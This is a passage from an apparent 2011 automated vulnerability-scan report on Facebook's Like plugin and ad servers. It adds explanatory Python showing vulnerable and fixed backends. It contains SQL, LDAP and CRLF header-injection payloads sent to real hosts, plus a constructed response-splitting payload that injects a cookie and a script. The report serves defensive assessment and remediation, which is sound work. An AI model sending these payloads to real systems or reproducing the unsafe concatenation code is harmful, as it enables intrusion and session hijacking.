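TRUE_PAYLOAD = BASE + "30846501' or 1=1-- "      # the report's payloads, URL-decoded
FALSE_PAYLOAD = BASE + "30846501' or 1=2-- "

# Per-response identifiers (the connect_widget_4e25ecd0... ids in the report are
# one example) would make every pair of responses differ; mask them first.
_VOLATILE = re.compile(r"[0-9a-f]{12,}")


def normalise(body):
    return _VOLATILE.sub("ID", body)


def make_injectable_backend():
    """Constructed: the cookie is concatenated into SQL, and the page shows a
    different greeting depending on whether the query matched a row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visitor (datr TEXT, name TEXT)")
    conn.execute("INSERT INTO visitor VALUES (?, ?)", (BASE, "known"))
    counter = [0]

    def fetch(datr):
        counter[0] += 1                         # a fresh widget id per response
        sql = "SELECT name FROM visitor WHERE datr = '" + datr + "'"
        try:
            rows = conn.execute(sql).fetchall()
        except sqlite3.Error:
            return "<html>error</html>"
        who = rows[0][0] if rows else "new"
        return "<html>visitor=%s widget_%016x</html>" % (who, counter[0])
    return fetch


def make_ab_backend():
    """Constructed: input is ignored, but alternate requests receive the
    inline-stylesheet and linked-stylesheet variants seen in the report."""
    counter = [0]

    def fetch(datr):
        counter[0] += 1
        if counter[0] % 2:
            return "<html><style>body{margin:0}</style>Like</html>"
        return '<html><link rel="stylesheet" href="/s.css">Like</html>'
    return fetch


def confirm_boolean_injection(fetch, base, true_payload, false_payload, rounds=4):
    """Stricter form of the difference test: over several rounds the baseline
    and the always-true payload must each be stable and agree with each other,
    and the always-false payload must be stable and differ from them."""
    base_set = {normalise(fetch(base)) for _ in range(rounds)}
    true_set = {normalise(fetch(true_payload)) for _ in range(rounds)}
    false_set = {normalise(fetch(false_payload)) for _ in range(rounds)}
    stable = len(base_set) == len(true_set) == len(false_set) == 1
    return stable and true_set == base_set and false_set != base_set


if __name__ == "__main__":
    for name, factory in (("concat", make_injectable_backend), ("a/b", make_ab_backend)):
        print(name, confirm_boolean_injection(factory(), BASE, TRUE_PAYLOAD, FALSE_PAYLOAD))
```

The A/B backend fails the stability requirement on its own, without any payload reaching a query, which is exactly the pattern in the two Facebook responses; a single request per payload, as in the scanner's check, cannot tell that apart from a real boolean-based injection.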

Request 1

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb30846501'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.148.39
X-Cnection: close
Date: Tue, 19 Jul 2011 20:45:03 GMT
Content-Length: 25038

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embed}
h1, h2, h3, h4, h5, h6{font-size: 13px;color:#333;margin:0;padding:0}
h1{font-size: 14px}
h4, h5{font-size: 11px}
p{margin:1em 0}
a{cursor:pointer;color:#3b5998;-moz-outline-style:none;text-decoration:none}
a:hover{text-decoration:underline}
img{border:0}
td,
td.label{font-size: 11px;text-align:left}
dd{color:#000}
dt{color:#777}
ul{list-style-type:none;margin:0;padding:0}
abbr{border-bottom:none}
hr{background:#d9d9d9;border-width:0;color:#d9d9d9;height:1px}
.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}
.clearfix{display:block;zoom:1}
.datawrap{word-wrap:break-word}
.word_break{display:block;float:left;margin-left:-10px;padding:0}
.img_loading{position:absolute;left:-100000px;top:-100000px}
.aero{opacity:.5}
.column{float:left}
.center{margin-left:auto;margin-right:auto}
#facebook .hidden_elem{display:none !important}
#facebook .invisible_elem{visibility:hidden}
.direction_ltr{direction:ltr}
.direction_rtl{direction:rtl}
.text_align_ltr{text-align:left}
.text_align_rtl{text-align:right}
body.plugin{background:transparent;overflow-y:visible}
body.transparent_widget{background-color:transparent;overflow:hidden}
body.plugin.transparent_widget{overflow-y:hidden}
.connect_widget{background-color:transparent}
.connect_widget .connect_widget_facebook_favicon{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png) no-repeat -1px -47px transparent;display:block;height:14px;padding:0 0 0 0;width:14px;position:absolute;left:-1px}
.connect_widget .connect_widget_interactive_area{border-collapse:collapse}
.connect_widget td.connect_widget_vertical_center{border-spacing:0;font-size: 11px;line-height:normal;padding:0}
.connect_widget td.connect_widget_button_cell{vertical-align:top}
.connect_widget td.connect_widget_co
...[SNIP]...

Request 2

GET /plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html?p1=News_links
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb30846501'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.149.54
X-Cnection: close
Date: Tue, 19 Jul 2011 20:45:04 GMT
Content-Length: 6617

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/zHNaHvAFp7N.css" />
<script>onloadhooks=[];onloadRegister=function(a){onloadhooks.push(a);};onafterloadhooks=[];onafterloadRegister=function(a){onafterloadhooks.push(a);};var AsyncLoader=(function(){var e=document.getElementsByTagName('head')[0],g=0,f=false,b=function(){if(document.readyState in {loaded:1,complete:1}){document.detachEvent("onreadystatechange",b);a('t_domcontent');}},c=function(){g--;d();},d=function(){if(g===0&&f===true){_onloadHook();a('t_layout');a('t_onload');_onafterloadHook();}},a=function(h){if(CavalryLogger)CavalryLogger.getInstance().setTimeStamp(h);};return {load:function(h){var i=0,j;for(;i<h.length;i++){j=document.createElement('script');j.src=h[i];j.async=true;j.onload=c;j.onreadystatechange=function(){if(j.readyState in {loaded:1,complete:1}){c();j.onreadystatechange=null;}};g++;e.appendChild(j);}window.onload=function(){f=true;d();};if(CavalryLogger)if(window.addEventListener){window.addEventListener('DOMContentLoaded',function(){a('t_domcontent');},false);}else if(document.attachEvent)document.attachEvent("onreadystatechange",b);},loadCSS:function(h){var i=document.createElement('link');i.rel="stylesheet";i.type="text/css";i.media="all";i.href=h;e.appendChild(i);}};})();
AsyncLoader.load(["http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y3\/r\/4M_1PP4LZN8.js"]);</script></head><body class="plugin transparent_widget ff3 Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4e25ecd01fc876681075271" class="connect_widget" style="font-family: &quot;arial&quot;, sans-serif"><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_lik
...[SNIP]...

2. LDAP injection

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The datr cookie appears to be vulnerable to LDAP injection attacks.

The payloads ddad234c5be87454)(sn=* and ddad234c5be87454)!(sn=* were each submitted in the datr cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner: the first payload would leave such a filter well-formed while adding a wildcard branch, whereas the second would make it syntactically invalid.

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. The two responses below are the same inline-stylesheet and linked-stylesheet variants seen in 1.4 (Content-Length 6945 and 25372), so the difference is not evidence that either payload reached a directory query.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.
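
What the two probes do to a filter, and what the escaping changes, as an added example (not Facebook's code): the filter template is hypothetical, the parser is a minimal RFC 4515 reader that raises on malformed input the way a directory server would, and escape_ldap_value implements the \XX escaping RFC 4515 defines for * ( ) \ and NUL. Rejecting such input outright, as the remediation recommends, is simpler; escaping is the fallback for values that legitimately contain those characters.

```python
PAYLOAD_OR = "ddad234c5be87454)(sn=*"       # the report's two probes
PAYLOAD_NOT = "ddad234c5be87454)!(sn=*"


def escape_ldap_value(value):
    """RFC 4515 escaping for a value placed inside a search filter: * ( ) \\
    and NUL become \\XX hex escapes, so the value can never add, close or
    alter a filter component."""
    out = []
    for ch in value:
        if ch in "*()\\\x00":
            out.append("\\%02x" % ord(ch))
        else:
            out.append(ch)
    return "".join(out)


def build_filter_unsafe(datr):
    # Hypothetical disjunctive filter of the kind the scanner's probes target.
    return "(|(datr=%s)(type=plugin))" % datr


def build_filter_safe(datr):
    return "(|(datr=%s)(type=plugin))" % escape_ldap_value(datr)


def _parse(s, i):
    """Minimal RFC 4515 filter parser. Returns (node, next_index) and raises
    ValueError on malformed input."""
    if i >= len(s) or s[i] != "(":
        raise ValueError("expected '(' at %d" % i)
    i += 1
    if i >= len(s):
        raise ValueError("truncated filter")
    if s[i] in "&|":
        op, i, items = s[i], i + 1, []
        while i < len(s) and s[i] == "(":
            node, i = _parse(s, i)
            items.append(node)
        node = (op, items)
    elif s[i] == "!":
        sub, i = _parse(s, i + 1)
        node = ("!", [sub])
    else:
        j = s.find(")", i)
        if j < 0:
            raise ValueError("unterminated item")
        attr, _, val = s[i:j].partition("=")
        node = ("=", attr, val)
        i = j
    if i >= len(s) or s[i] != ")":
        raise ValueError("expected ')' at %d" % i)
    return node, i + 1


def parse_filter(s):
    node, end = _parse(s, 0)
    if end != len(s):
        raise ValueError("trailing data after filter")
    return node


def branch_count(build, value):
    """Top-level branches of the resulting OR filter, or None when the server
    would reject it: the two outcomes the scanner's probes tell apart."""
    try:
        return len(parse_filter(build(value))[1])
    except ValueError:
        return None


if __name__ == "__main__":
    for build in (build_filter_unsafe, build_filter_safe):
        print(build.__name__, branch_count(build, PAYLOAD_OR), branch_count(build, PAYLOAD_NOT))
```

With concatenation the first probe yields a three-branch filter (the attacker's (sn=*) matches every entry with a surname) and the second is rejected, which is the asymmetry the scanner looks for; after escaping both probes stay inside the datr value and the filter keeps its two branches.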

Request 1

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ddad234c5be87454)(sn=*; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.48.45
X-Cnection: close
Date: Tue, 19 Jul 2011 18:38:37 GMT
Content-Length: 6945

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/gn-vukSYjxu.css" />
<script>onloadhooks=[];onloadRegister=function(a){onloadhooks.push(a);};onafterloadhooks=[];onafterloadRegister=function(a){onafterloadhooks.push(a);};var AsyncLoader=(function(){var e=document.getElementsByTagName('head')[0],g=0,f=false,b=function(){if(document.readyState in {loaded:1,complete:1}){document.detachEvent("onreadystatechange",b);a('t_domcontent');}},c=function(){g--;d();},d=function(){if(g===0&&f===true){_onloadHook();a('t_layout');a('t_onload');_onafterloadHook();}},a=function(h){if(CavalryLogger)CavalryLogger.getInstance().setTimeStamp(h);};return {load:function(h){var i=0,j;for(;i<h.length;i++){j=document.createElement('script');j.src=h[i];j.async=true;j.onload=c;j.onreadystatechange=function(){if(j.readyState in {loaded:1,complete:1}){c();j.onreadystatechange=null;}};g++;e.appendChild(j);}window.onload=function(){f=true;d();};if(CavalryLogger)if(window.addEventListener){window.addEventListener('DOMContentLoaded',function(){a('t_domcontent');},false);}else if(document.attachEvent)document.attachEvent("onreadystatechange",b);},loadCSS:function(h){var i=document.createElement('link');i.rel="stylesheet";i.type="text/css";i.media="all";i.href=h;e.appendChild(i);}};})();
AsyncLoader.load(["http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/y3\/r\/4M_1PP4LZN8.js"]);</script></head><body class="plugin transparent_widget safari4 win Locale_en_US"><div id="FB_HiddenContainer" style="position:absolute; top:-10000px; width:0px; height:0px;"></div><div id="LikePluginPagelet"><div id="connect_widget_4e25cf2dda74b9297241635" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></
...[SNIP]...

Request 2

GET /plugins/like.php?action=recommend&api_key=140669015975185&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31a2e41bc%26origin%3Dhttp%253A%252F%252Fwww.ticketmaster.com%252Ffc54d770c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&href=http%3A%2F%2Fo.socl.be%2Fnbl0lg03&layout=standard&locale=en_US&node_type=link&ref=tmus67EventLikeButton-1287641246826c&sdk=joey&show_faces=true&width=300 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ddad234c5be87454)!(sn=*; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.174.25
X-Cnection: close
Date: Tue, 19 Jul 2011 18:38:38 GMT
Content-Length: 25372

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Like | Facebook</title><style>body{background:#fff;font-size: 11px;font-family:"lucida grande",tahoma,verdana,arial,sans-serif;color:#333;margin:0;padding:0;text-align:left;direction:ltr;unicode-bidi:embed}
h1, h2, h3, h4, h5, h6{font-size: 13px;color:#333;margin:0;padding:0}
h1{font-size: 14px}
h4, h5{font-size: 11px}
p{margin:1em 0}
a{cursor:pointer;color:#3b5998;-moz-outline-style:none;text-decoration:none}
a:hover{text-decoration:underline}
img{border:0}
td,
td.label{font-size: 11px;text-align:left}
dd{color:#000}
dt{color:#777}
ul{list-style-type:none;margin:0;padding:0}
abbr{border-bottom:none}
hr{background:#d9d9d9;border-width:0;color:#d9d9d9;height:1px}
.clearfix:after{clear:both;content:".";display:block;font-size:0;height:0;line-height:0;visibility:hidden}
.clearfix{display:block;zoom:1}
.datawrap{word-wrap:break-word}
.word_break{display:block;float:left;margin-left:-10px;padding:0}
.img_loading{position:absolute;left:-100000px;top:-100000px}
.aero{opacity:.5}
.column{float:left}
.center{margin-left:auto;margin-right:auto}
#facebook .hidden_elem{display:none !important}
#facebook .invisible_elem{visibility:hidden}
.direction_ltr{direction:ltr}
.direction_rtl{direction:rtl}
.text_align_ltr{text-align:left}
.text_align_rtl{text-align:right}
body.plugin{background:transparent;overflow-y:visible}
body.transparent_widget{background-color:transparent;overflow:hidden}
body.plugin.transparent_widget{overflow-y:hidden}
.connect_widget{background-color:transparent}
.connect_widget .connect_widget_facebook_favicon{background:url(http://static.ak.fbcdn.net/rsrc.php/v1/z7/r/ql9vukDCc4R.png) no-repeat -1px -47px transparent;display:block;height:14px;padding:0 0 0 0;width:14px;position:absolute;left:-1px}
.connect_widget .connect_widget_interactive_area{border-collapse:collapse}
.connect_widget td.connect_widget_vertical_center{border-spacing:0;font-size: 11px;line-height:normal;padding:0}
.connect_widget td.connect_widget_button_cell{vertical-align:top}
.connect_widget td.connect_widget_co
...[SNIP]...

3. HTTP header injection
There are 3 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
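
The splitting described above and the allow-list fix, as an added example (not the DoubleClick or Mookie code): redirect_unsafe copies a decoded path segment into Location, parse_response reads the result the way a client or proxy would, and redirect_safe applies the short-alphanumeric allow-list from the remediation. The host static.example, the /banner.gif suffix and PAYLOAD_SPLIT are constructed; PAYLOAD_PROBE is the probe from 3.1.

```python
import re
from urllib.parse import unquote

PAYLOAD_PROBE = "3d907%0d%0aabe9ed35d54"    # the scanner's probe from 3.1
# Constructed: adds a header and, via the blank line, an attacker-chosen body.
PAYLOAD_SPLIT = "x%0d%0aSet-Cookie:%20sid=evil%0d%0a%0d%0a<script>alert(1)</script>"

_SAFE_SEGMENT = re.compile(r"[A-Za-z0-9_.-]{1,64}")    # allow-list, per the remediation


def _build_redirect(segment):
    return ("HTTP/1.1 302 Moved Temporarily\r\n"
            "Location: http://static.example/" + segment + "/banner.gif\r\n"
            "Content-Type: text/html\r\n"
            "\r\n"
            "<h1>Error 302 Moved Temporarily</h1>")


def redirect_unsafe(raw_segment):
    """Vulnerable: the URL-decoded path segment goes straight into Location."""
    return _build_redirect(unquote(raw_segment))


def redirect_safe(raw_segment):
    """Fixed: after decoding, reject anything outside a short allow-list, which
    excludes CR, LF and every other character below 0x20."""
    segment = unquote(raw_segment)
    if not _SAFE_SEGMENT.fullmatch(segment):
        return "HTTP/1.1 400 Bad Request\r\nContent-Length: 0\r\n\r\n"
    return _build_redirect(segment)


def parse_response(raw):
    """Split a raw response the way a client or proxy does: the header block
    ends at the first blank line, whatever the server intended.
    Returns (status_line, {header: value}, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return lines[0], headers, body


if __name__ == "__main__":
    for payload in (PAYLOAD_PROBE, PAYLOAD_SPLIT):
        status, headers, body = parse_response(redirect_unsafe(payload))
        print(status, headers, body[:40])
        print(redirect_safe(payload).split("\r\n")[0])
```

Run against the 3.1 probe, the parsed Location stops at 3d907 and the rest of the payload becomes a header line of its own, which is what the raw response in 3.1 shows; the split payload goes further and sets a cookie and a body, the cache-poisoning case described above. Decoding before validation matters: checking the raw, still-encoded segment would pass %0d%0a through.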


3.1. http://ad.doubleclick.net/adi/N1558.NetMining/B5146585.127 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1558.NetMining/B5146585.127

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 3d907%0d%0aabe9ed35d54 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /3d907%0d%0aabe9ed35d54/N1558.NetMining/B5146585.127;sz=728x90;pc=%5BTPAS_ID%5D;ord=1311108175;click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=;? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://a.netmng.com/hic/?nm_width=728&nm_height=90&nm_publ=201&nm_c=250&beacon=November2010&url=Undertone&passback&click=http://ads.undertone.com/c?oaparams=2__bannerid=174266__campaignid=28159__zoneid=16565__UTLCA=1__ptm=1671__cb=94bf6c6737ee486194ee917598e78a1c__bk=lolljh__id=2vaimk2c7zwrks2trxj9vaxbr__oadest=
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3d907
abe9ed35d54
/N1558.NetMining/B5146585.127;sz=728x90;pc=[TPAS_ID];ord=1311108175;click=http: //ads.undertone.com/c
Date: Tue, 19 Jul 2011 20:43:37 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/adj/cm.quadbostonglobe/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.quadbostonglobe/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 4f343%0d%0a9db56c3167b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /4f343%0d%0a9db56c3167b/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=340;dc=w;btg=bz.25;ord=1311108273? HTTP/1.1
Host: ad.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4f343
9db56c3167b
/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.340-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=340;dc=w;btg=bz.25;ord=1311108273:
Date: Tue, 19 Jul 2011 20:46:05 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://matcher.bidder7.mookie1.com/google [cver parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://matcher.bidder7.mookie1.com
Path:   /google

Issue detail

The value of the cver request parameter is copied into the X-ZAMA-MATCHER-ERROR response header. The payload e9da1%0d%0a3ed374399eb was submitted in the cver parameter. This caused a response containing an injected HTTP header.

Request

GET /google?id=CAESEFFfAiSla_DJpyyLAGXwDX8&cver=e9da1%0d%0a3ed374399eb&can=ffffffffffffffff HTTP/1.1
Host: matcher.bidder7.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/TRACK_Ticketmaster/LN/RTG_SX_NonSecure@Bottom3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; NXCLICK2=011QbQnINX_NonSecure!y!B3!gA!14lNX_TRACK_Xerox/XLS2011/ZAPTraderBluekaiBusinessDecisionMakerData_NX_NonSecure!y!B3!JLQ!Hfk; ticketmaster=true; artist=:1308249; venueid=:1233; minorcatid=:1; RMFM=011QjF9J810JLQ|U10MCo|U10QMP|010TqE|U10Vu1|U10WDN; id=2814750682866683; session=1311100565|1311100565

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:37:56 GMT
Server: Apache/2.2.3 (Red Hat)
X-ZAMA-MATCHER-ERROR: google has sent non numeric (or zero) cver 'e9da1
3ed374399eb
'
Cache-Control: no-cache,no-store,private
Pragma: no-cache
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

4. Cross-site scripting (reflected)
There are 151 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

